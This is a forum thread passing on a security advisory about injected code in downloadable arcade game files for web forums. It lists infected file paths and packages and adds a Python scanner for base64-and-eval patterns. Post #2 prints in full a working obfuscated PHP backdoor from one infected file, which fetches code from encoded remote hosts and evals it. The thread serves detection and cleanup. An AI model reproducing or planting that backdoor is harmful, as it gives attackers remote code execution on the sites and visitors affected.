Arcade Games Security Advisory
NickTheGreek
post Sep 7 2013, 01:31 PM
Post #1



Administrator

Group: Root Admin
Posts: 8,503
Joined: 7-May 06
From: Athens, Greece
Member No.: 1



Due to recent developments regarding Arcade Security, we owe this information to our members, quoting invisionarcade.com:

QUOTE(invisionarcade.com)
Effective immediately, there are no longer any game downloads allowed to any members or groups.

This has nothing to do with anything other than security, not this site's security, but the security of all those who download games and install them elsewhere on other sites.

I care about our community and that is the reason I am doing this. I'm sure our visitor count will fall, but that's not what is important.

Recently, a number of sites have been hacked. This is not a new occurrence, but when it happens, the entire community has to band together and try to find out who and do what's necessary.

I have found a number of game files infected with code not originally included in the game by the original game coder. I will not give any information about the code, other than to say it is there and anyone downloading an affected game will then have this game and hacker's code on their site. So, to not spread this code to others, I am not allowing any game downloads until the situation is resolved. All the games infected here will be cleaned and the code removed.

The host has tremendous capabilities to investigate IPs and this may also be referred as a criminal act and those found to be doing the bad deeds will be pursued and punished if/when possible to the full extent of the law by whatever means and resources I have, as well as by my hosting company.

I will update this thread if/whenever I have pertinent information that is of benefit to the community. This is not all about me or my sites, but the community at large.

EVERY WEBMASTER WHO EITHER OWNS OR ADMINISTRATES A WEBSITE, AND WHO HAS FTP ACCESS, SHOULD BE AWARE THAT THEY STAND A VERY GOOD CHANCE OF DISCOVERING THEIR SITE HAS CODE INFECTED GAMES AND THEY SHOULD MANUALLY CHECK GAMEDATA FOLDERS FOR THESE INFECTED FILES AND DELETE THEM.

THERE IS EVIDENCE THAT MANY GAMES CONTAIN EXPLOIT CODE AS FAR BACK AS 2011 OR EARLIER.

JUST A HEADS UP THAT THIS PROBLEM OF GAMES CONTAINING EXPLOITED FILES WITH CODE IS PROBABLY MORE FAR REACHING THAN FIRST IMAGINED.


..........................................................

HACKING IS ILLEGAL


I have contacted my host and have instructed them to pursue legal action and if they can not do so, I intend to:
    1. Fill out a "Complaint Assistant" form with the Federal Trade Commission. The information provided will be added to a database for further investigation purposes.
    2. File a complaint with the FBI and fill out the bureau's "Public Tips and Leads" form.
    3. Report the hacking occurrences to the Internet Crime Complaint Center (IC3).
I will also solicit other website owners who were hacked to join in this action, to put more weight and force into this action.

Hopefully with the clues, IP logs and other evidence, we can find and punish the person responsible.

This is one piece of evidence found in the infected files and there are plenty more clues that will lead to the person responsible.



CODE
arcade/gamedata/dottiesm/index.php
arcade/gamedata/dottiesm/dottiesm_hiscores.php
arcade/gamedata/abbasonamissionv32/52232.php
arcade/gamedata/ultimatepingibpro/ultimatepingibpro_hiscores.php
arcade/gamedata/ultimatepingibpro/index.php
arcade/gamedata/GyrustakeeDR/index.php
arcade/gamedata/chopperdodgesm/chopperdodgesm_hiscores.php
arcade/gamedata/chopperdodgesm/index.php
arcade/gamedata/eggrunsm/index.php
arcade/gamedata/eggrunsm/eggrunsm_hiscores.php
arcade/gamedata/elevation2sm/index.php
arcade/gamedata/elevation2sm/elevation2sm_hiscores.php
arcade/gamedata/StuntCrewAS3v2DR/level_BIG.xml
arcade/gamedata/fishyv32/191309.php
arcade/gamedata/balloondsm/index.php
arcade/gamedata/balloondsm/balloondsm_hiscores.php
arcade/gamedata/majorslantibpro/index.php
arcade/gamedata/majorslantibpro/majorslantibpro_hiscores.php
arcade/gamedata/blockadeblitzv32e/133957.php
arcade/gamedata/blockadeblitzv32e/101577.php
arcade/gamedata/homerunv32MICRO/102742.php
arcade/gamedata/homerunv32MICRO/149173.php
arcade/gamedata/amazingsheriffAS3v2Th/costumThunder_one.swf
arcade/gamedata/dragonhuntsm/index.php
arcade/gamedata/fieldgoalibpro/index.php
arcade/gamedata/fieldgoalibpro/fieldgoalibpro_hiscores.php
arcade/gamedata/booibpro/booibpro_hiscores.php
arcade/gamedata/booibpro/index.php
arcade/gamedata/DynastyStreetSsm/DynastyStreetSsm_hiscores.php
arcade/gamedata/DynastyStreetSsm/index.php
arcade/gamedata/yeti9sm/yeti9sm_hiscores.php
arcade/gamedata/yeti9sm/index.php
arcade/gamedata/elevation2/index.php
arcade/gamedata/pickies_v32/66349.php
arcade/gamedata/pickies_v32/173026.php
arcade/gamedata/boingggsm/index.php
arcade/gamedata/boingggsm/boingggsm_hiscores.php
arcade/gamedata/celepowerlsm/celepowerlsm_hiscores.php
arcade/gamedata/celepowerlsm/index.php
arcade/gamedata/42gamesGC/xml/index.php
arcade/gamedata/duncanmansm/index.php
arcade/gamedata/duncanmansm/duncanmansm_hiscores.php
arcade/gamedata/armadillosm/index.php
arcade/gamedata/crazyfrogdancesm/crazyfrogdancesm_hiscores.php
arcade/gamedata/crazyfrogdancesm/index.php
arcade/gamedata/conundrumibpro/conundrumibpro_hiscores.php
arcade/gamedata/conundrumibpro/index.php
arcade/gamedata/DynastyStreetTsm/DynastyStreetTsm_hiscores.php
arcade/gamedata/DynastyStreetTsm/index.php
arcade/gamedata/AmmunitionMissionsm/index.php
arcade/gamedata/AmmunitionMissionsm/AmmunitionMissionsm_hiscores.php
arcade/gamedata/dearthsm/index.php
arcade/gamedata/dearthsm/dearthsm_hiscores.php
arcade/gamedata/tetrixibpro/tetrixibpro_hiscores.php
arcade/gamedata/tetrixibpro/index.php
arcade/gamedata/shredderBH/index.php
arcade/gamedata/shredderBH/shredderBH_hiscores.php
arcade/gamedata/flashballv32/142122.php
arcade/gamedata/comicblastersm/index.php
arcade/gamedata/comicblastersm/comicblastersm_hiscores.php
arcade/gamedata/masterQuanMenoMahv32Th/42179.php
arcade/gamedata/masterQuanMenoMahv32Th/52197.php
arcade/gamedata/masterQuanMenoMahv32Th/157088.php
arcade/gamedata/andersenplatsm/andersenplatsm_hiscores.php
arcade/gamedata/andersenplatsm/index.php





NickTheGreek
post Sep 7 2013, 01:47 PM
Post #2






I think the problem involves many more files and unless scanned with CXS (ConfigServer Exploit Scanner, http://configserver.com/cp/cxs.html) many more PHP files include base64 expressions (still until obfuscated we have no clue on the code run by those).

This is a list I just got from twitterarcade.com with FIND / GREP:

CODE
./gamedata/boingggsm/boingggsm_hiscores.php
./gamedata/boingggsm/index.php
./gamedata/mjartifacts2v32Th/233574.php
./gamedata/mjartifacts2v32Th/41838.php
./gamedata/celepowerlsm/index.php
./gamedata/celepowerlsm/celepowerlsm_hiscores.php
./gamedata/booibpro/index.php
./gamedata/booibpro/booibpro_hiscores.php
./gamedata/heli3DR/index.php
./gamedata/hs100mdashsm/index.php
./gamedata/hs100mdashsm/hs100mdashsm_hiscores.php
./gamedata/fieldgoalibpro/index.php
./gamedata/fieldgoalibpro/fieldgoalibpro_hiscores.php
./gamedata/comicblastersm/index.php
./gamedata/comicblastersm/comicblastersm_hiscores.php
./gamedata/mightydeskwobblersm/mightydeskwobblersm_hiscores.php
./gamedata/mightydeskwobblersm/index.php
./gamedata/blockadeblitzv32e/133957.php
./gamedata/blockadeblitzv32e/101577.php
./gamedata/elevation2/index.php
./gamedata/tetris2ibpro/index.php
./gamedata/tetris2ibpro/tetris2ibpro_hiscores.php
./gamedata/abbasonamissionv32/52232.php
./gamedata/dottiesm/index.php
./gamedata/dottiesm/dottiesm_hiscores.php
./gamedata/throwitsm/index.php
./gamedata/fruitsmashv32Sparky/8261.php
./gamedata/JewelsJack_v32/144327.php
./gamedata/JewelsJack_v32/17376.php
./gamedata/bobcatThv32/56730.php
./gamedata/squishibpro/index.php
./gamedata/squishibpro/squishibpro_hiscores.php
./gamedata/catbaseball_amav32Sparky/114340.php
./gamedata/catbaseball_amav32Sparky/126010.php
./gamedata/tetrixibpro/index.php
./gamedata/tetrixibpro/tetrixibpro_hiscores.php
./gamedata/feGC/70022.php
./gamedata/fishyv32/191309.php
./gamedata/shredderBH/index.php
./gamedata/shredderBH/shredderBH_hiscores.php
./gamedata/catchoThv32/169529.php
./gamedata/FiveAcornsSte/216306.php
./gamedata/FiveAcornsSte/37973.php
./gamedata/sequenceribpro/index.php
./gamedata/sequenceribpro/sequenceribpro_hiscores.php
./gamedata/homerunv32MICRO/102742.php
./gamedata/homerunv32MICRO/149173.php
./gamedata/flashstrikev32/138340.php
./gamedata/cavemanrunThv32/171360.php
./gamedata/cavemanrunThv32/229675.php
./gamedata/dragonhuntsm/index.php
./gamedata/elevation2sm/index.php
./gamedata/elevation2sm/elevation2sm_hiscores.php
./gamedata/toxicblastersm/toxicblastersm_hiscores.php
./gamedata/toxicblastersm/index.php
./gamedata/GyrustakeeDR/index.php
./gamedata/armadillosm/index.php
./gamedata/climacool2v32/93416.php
./gamedata/collapseshy/159172.php
./gamedata/masterQuanMenoMahv32Th/42179.php
./gamedata/masterQuanMenoMahv32Th/157088.php
./gamedata/masterQuanMenoMahv32Th/52197.php
./gamedata/42gamesGC/xml/index.php
./gamedata/actionfishv32/25104.php
./gamedata/actionfishv32/177400.php
./gamedata/lettersgamesm/index.php
./gamedata/balloondsm/index.php
./gamedata/balloondsm/balloondsm_hiscores.php
./gamedata/AmmunitionMissionsm/index.php
./gamedata/AmmunitionMissionsm/AmmunitionMissionsm_hiscores.php
./gamedata/pepperwater3sm/index.php
./gamedata/pepperwater4sm/index.php
./gamedata/airdodgev32/180179.php
./gamedata/flashballv32/142122.php
./gamedata/CaptainBradysReturnToTheBigTop_v32/130732.php
./gamedata/pickies_v32/173026.php
./gamedata/pickies_v32/66349.php


If anyone has SSH access I would be glad to share the search command so you can search your own arcade folder.

Upon opening ./gamedata/JewelsJack_v32/17376.php:

CODE


<? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:        
$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);    
$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);    
$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:            
$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);
$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z="/?".base64_encode($a).".".
base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".
".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("cGhwc2VhcmNoLmNu");
if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="13f500a36523cbe752d73b867464e204")
$f=$_REQUEST["id"];if((include(base64_decode("aHR0cDovL2FkczEu").$f.$z)));else
if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);
curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);}; ?>


and this is getting too popular:

CODE
http://www.boonex.com/n/Any_ideas_about_this_hack_in_6_1_4_


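A triage sketch for the check described in post #2, added here as an example: it is not part of the original thread and is not the poster's FIND / GREP command. It walks a folder, marks any file that pairs `base64_decode` with a code-executing or remote-fetching call, and decodes quoted literals so a reviewer can read them. The sink list, the size cap and the function names are assumptions; files are scanned by content because the list in post #1 also names `.xml` and `.swf` files.

```python
import base64
import re
from pathlib import Path

# Quoted literal passed straight to base64_decode(), as in the sample in post #2.
B64_LITERAL = re.compile(r"""base64_decode\(\s*["']([A-Za-z0-9+/=]+)["']\s*\)""")
# Calls that execute or fetch code (assumed list, extend as needed).
SINK = re.compile(r"\b(eval|include|include_once|require|require_once|"
                  r"file_get_contents|curl_exec)\s*\(")
MAX_BYTES = 2 * 1024 * 1024  # assumed cap so large binaries are skipped


def decode_literals(source):
    """Decode every base64_decode("...") literal; skip invalid base64."""
    decoded = []
    for literal in B64_LITERAL.findall(source):
        try:
            raw = base64.b64decode(literal, validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        decoded.append(raw.decode("latin-1"))
    return decoded


def scan_tree(root):
    """Scan every file under root by content, not by extension."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file() or path.stat().st_size > MAX_BYTES:
            continue
        source = path.read_bytes().decode("latin-1")
        if "base64_decode" not in source:
            continue
        sinks = sorted(set(SINK.findall(source)))
        findings.append({
            "path": path.relative_to(root).as_posix(),
            "sinks": sinks,                      # which risky calls appear
            "decoded": decode_literals(source),  # plaintext of each literal
            "suspicious": bool(sinks),           # base64_decode plus a sink
        })
    return findings


if __name__ == "__main__":
    import sys
    for hit in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "."):
        label = "REVIEW" if hit["suspicious"] else "note"
        print(label, hit["path"], hit["sinks"], hit["decoded"], sep="\t")
```

Literals that are built by concatenation or wrapped in further encoding layers are not decoded, so an empty `decoded` list on a flagged file still calls for manual review.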
NickTheGreek
post May 26 2014, 07:40 PM
Post #3






Potentially Harmful TAR files ( will be checked extensively )

game_andersenplatsm.tar
game_ultimatepingibpro.tar
game_slidermaniaibpro.tar
game_AmmunitionMissionsm.tar
game_AmmunitionMission2sm.tar
game_chopperdodgesm.tar
game_fieldgoalibpro.tar
game_socceribpro.tar
game_majorslantibpro.tar
game_jigsawmonkeyibpro.tar
game_sequenceribpro.tar
game_rotobosm.tar
game_conundrumibpro.tar
game_celepowerlsm.tar

